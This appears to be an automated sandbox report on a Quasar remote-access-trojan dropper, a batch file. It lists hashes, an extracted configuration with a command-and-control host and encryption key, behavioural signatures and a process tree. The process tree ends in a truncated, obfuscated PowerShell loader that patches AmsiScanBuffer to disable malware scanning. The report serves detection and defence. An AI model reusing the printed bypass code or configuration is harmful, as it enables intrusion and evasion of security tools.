Analysis
-
max time kernel
300s -
max time network
289s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-05-2024 13:41
Static task
static1
Behavioral task
behavioral1
Sample
New1.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
New1.bat
Resource
win10v2004-20240508-en
General
-
Target
New1.bat
-
Size
1002KB
-
MD5
f6d5bfaee8a55ff72c7b453fda066d62
-
SHA1
7d737d53013990e5d05076b7206e43eb4793fc7f
-
SHA256
3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
-
SHA512
e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284
-
SSDEEP
12288:NzPPeJOTZMGuIl99I2FxGwvYXDSeengmfn5tKvy0H5JbcGfRZIJZ32hxnQxCGaF9:NDeYum99IGP8f2rRO5JFPIJZ8GaF8XmB
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
3.1.5
Video
runderscore00-25501.portmap.host:25501
$Sxr-oWTh3ZS9htfe80iIl5
-
encryption_key
zK8u0rpHf4TJzGf65Flt
-
install_name
Win11.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
Windows 11 Boot
-
subdirectory
Win11
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral3/memory/5060-22-0x00000000080F0000-0x00000000081E2000-memory.dmp family_quasar behavioral3/memory/2084-79-0x0000000008700000-0x000000000876C000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\New.exe family_quasar behavioral3/memory/3100-91-0x00000000003C0000-0x000000000042C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1220 created 644 1220 powershell.EXE winlogon.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 2084 powershell.exe 4 2084 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 5060 powershell.exe 896 powershell.exe 2084 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
Processes:
New.exeInstall.exepid process 3100 New.exe 3744 Install.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 1220 set thread context of 1200 1220 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 56 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1B0F0662-E246-4328-BBA6-1600A4BDA848}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716903790" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 13:43:11 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 5060 powershell.exe 5060 powershell.exe 896 powershell.exe 896 powershell.exe 2084 powershell.exe 2084 powershell.exe 1220 powershell.EXE 1220 powershell.EXE 1220 powershell.EXE 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe 1200 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeIncreaseQuotaPrivilege 896 powershell.exe Token: SeSecurityPrivilege 896 powershell.exe Token: SeTakeOwnershipPrivilege 896 powershell.exe Token: SeLoadDriverPrivilege 896 powershell.exe Token: SeSystemProfilePrivilege 896 powershell.exe Token: SeSystemtimePrivilege 896 powershell.exe Token: SeProfSingleProcessPrivilege 896 powershell.exe Token: SeIncBasePriorityPrivilege 896 powershell.exe Token: SeCreatePagefilePrivilege 896 powershell.exe Token: SeBackupPrivilege 896 powershell.exe Token: SeRestorePrivilege 896 powershell.exe Token: SeShutdownPrivilege 896 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeSystemEnvironmentPrivilege 896 powershell.exe Token: SeRemoteShutdownPrivilege 896 powershell.exe Token: SeUndockPrivilege 896 powershell.exe Token: SeManageVolumePrivilege 896 powershell.exe Token: 33 896 powershell.exe Token: 34 896 powershell.exe Token: 35 896 powershell.exe Token: 36 896 powershell.exe Token: SeIncreaseQuotaPrivilege 896 powershell.exe Token: SeSecurityPrivilege 896 powershell.exe Token: SeTakeOwnershipPrivilege 896 powershell.exe Token: SeLoadDriverPrivilege 896 powershell.exe Token: SeSystemProfilePrivilege 896 powershell.exe Token: SeSystemtimePrivilege 896 powershell.exe Token: SeProfSingleProcessPrivilege 896 powershell.exe Token: SeIncBasePriorityPrivilege 896 powershell.exe Token: SeCreatePagefilePrivilege 896 powershell.exe Token: SeBackupPrivilege 896 powershell.exe Token: SeRestorePrivilege 896 powershell.exe Token: SeShutdownPrivilege 896 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeSystemEnvironmentPrivilege 896 powershell.exe Token: SeRemoteShutdownPrivilege 896 powershell.exe Token: SeUndockPrivilege 896 powershell.exe Token: SeManageVolumePrivilege 896 powershell.exe Token: 33 896 powershell.exe Token: 34 896 powershell.exe Token: 35 896 powershell.exe Token: 36 896 powershell.exe Token: SeIncreaseQuotaPrivilege 896 powershell.exe Token: SeSecurityPrivilege 896 powershell.exe Token: SeTakeOwnershipPrivilege 896 powershell.exe Token: SeLoadDriverPrivilege 896 powershell.exe Token: SeSystemProfilePrivilege 896 powershell.exe Token: SeSystemtimePrivilege 896 powershell.exe Token: SeProfSingleProcessPrivilege 896 powershell.exe Token: SeIncBasePriorityPrivilege 896 powershell.exe Token: SeCreatePagefilePrivilege 896 powershell.exe Token: SeBackupPrivilege 896 powershell.exe Token: SeRestorePrivilege 896 powershell.exe Token: SeShutdownPrivilege 896 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeSystemEnvironmentPrivilege 896 powershell.exe Token: SeRemoteShutdownPrivilege 896 powershell.exe Token: SeUndockPrivilege 896 powershell.exe Token: SeManageVolumePrivilege 896 powershell.exe Token: 33 896 powershell.exe Token: 34 896 powershell.exe Token: 35 896 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2084 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exeNew.exepowershell.EXEdllhost.exedescription pid process target process PID 1448 wrote to memory of 5060 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 5060 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 5060 1448 cmd.exe powershell.exe PID 5060 wrote to memory of 896 5060 powershell.exe powershell.exe PID 5060 wrote to memory of 896 5060 powershell.exe powershell.exe PID 5060 wrote to memory of 896 5060 powershell.exe powershell.exe PID 5060 wrote to memory of 1312 5060 powershell.exe WScript.exe PID 5060 wrote to memory of 1312 5060 powershell.exe WScript.exe PID 5060 wrote to memory of 1312 5060 powershell.exe WScript.exe PID 1312 wrote to memory of 564 1312 WScript.exe cmd.exe PID 1312 wrote to memory of 564 1312 WScript.exe cmd.exe PID 1312 wrote to memory of 564 1312 WScript.exe cmd.exe PID 564 wrote to memory of 2084 564 cmd.exe powershell.exe PID 564 wrote to memory of 2084 564 cmd.exe powershell.exe PID 564 wrote to memory of 2084 564 cmd.exe powershell.exe PID 2084 wrote to memory of 3100 2084 powershell.exe New.exe PID 2084 wrote to memory of 3100 2084 powershell.exe New.exe PID 2084 wrote to memory of 3100 2084 powershell.exe New.exe PID 2084 wrote to memory of 3744 2084 powershell.exe Install.exe PID 2084 wrote to memory of 3744 2084 powershell.exe Install.exe PID 2084 wrote to memory of 3744 2084 powershell.exe Install.exe PID 3100 wrote to memory of 4020 3100 New.exe SCHTASKS.exe PID 3100 wrote to memory of 4020 3100 New.exe SCHTASKS.exe PID 3100 wrote to memory of 4020 3100 New.exe SCHTASKS.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1220 wrote to memory of 1200 1220 powershell.EXE dllhost.exe PID 1200 wrote to memory of 644 1200 dllhost.exe winlogon.exe PID 1200 wrote to memory of 700 1200 dllhost.exe lsass.exe PID 1200 wrote to memory of 1008 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 472 1200 dllhost.exe dwm.exe PID 1200 wrote to memory of 760 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1060 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1136 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1160 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1184 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1228 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1236 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1296 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1356 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1468 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1592 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1616 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1660 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1668 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1780 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1832 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1868 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 1976 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2028 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2044 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2020 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2052 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2192 1200 dllhost.exe spoolsv.exe PID 1200 wrote to memory of 2280 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2384 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2508 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2516 1200 dllhost.exe svchost.exe PID 1200 wrote to memory of 2572 1200 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:472
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{31af0a40-e058-4f50-af24-ef948a2e9bff}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1200
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ahRhAUNXKdCH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qmzgyFJrBDvwNu,[Parameter(Position=1)][Type]$hxYdHXFEwa)$rTkaKYGWqCE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'cted'+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+'mo'+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rTkaKYGWqCE.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qmzgyFJrBDvwNu).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'Man'+[Char](97)+''+'g'+''+[Char](101)+'d');$rTkaKYGWqCE.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+'k'+'e',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+'c'+',Hide'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+','+'NewS'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$hxYdHXFEwa,$qmzgyFJrBDvwNu).SetImplementationFlags('R'+'u'+''+[Char](110)+'tim'+'e'+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $rTkaKYGWqCE.CreateType();}$ldazKVWzEhAiW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+'e'+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$xLyBbBWpPmqRrA=$ldazKVWzEhAiW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+'r'+''+'o'+''+'c'+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UkOwwXnStVxWzUdXrax=ahRhAUNXKdCH @([String])([IntPtr]);$xYIvnAbduWlZKjTCecBOOh=ahRhAUNXKdCH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DBkRMZEWIVg=$ldazKVWzEhAiW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+'e'+[Char](108)+''+'3'+'2'+'.'+''+'d'+''+[Char](108)+'l')));$LObivuLVNkoBPE=$xLyBbBWpPmqRrA.Invoke($Null,@([Object]$DBkRMZEWIVg,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$sXQVPlraSHxDTLcxf=$xLyBbBWpPmqRrA.Invoke($Null,@([Object]$DBkRMZEWIVg,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$SOngyHw=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LObivuLVNkoBPE,$UkOwwXnStVxWzUdXrax).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$gGaTxrxSGBisnGHQT=$xLyBbBWpPmqRrA.Invoke($Null,@([Object]$SOngyHw,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$CtRsLYUFHy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sXQVPlraSHxDTLcxf,$xYIvnAbduWlZKjTCecBOOh).Invoke($gGaTxrxSGBisnGHQT,[uint32]8,4,[ref]$CtRsLYUFHy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gGaTxrxSGBisnGHQT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sXQVPlraSHxDTLcxf,$xYIvnAbduWlZKjTCecBOOh).Invoke($gGaTxrxSGBisnGHQT,[uint32]8,0x20,[ref]$CtRsLYUFHy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+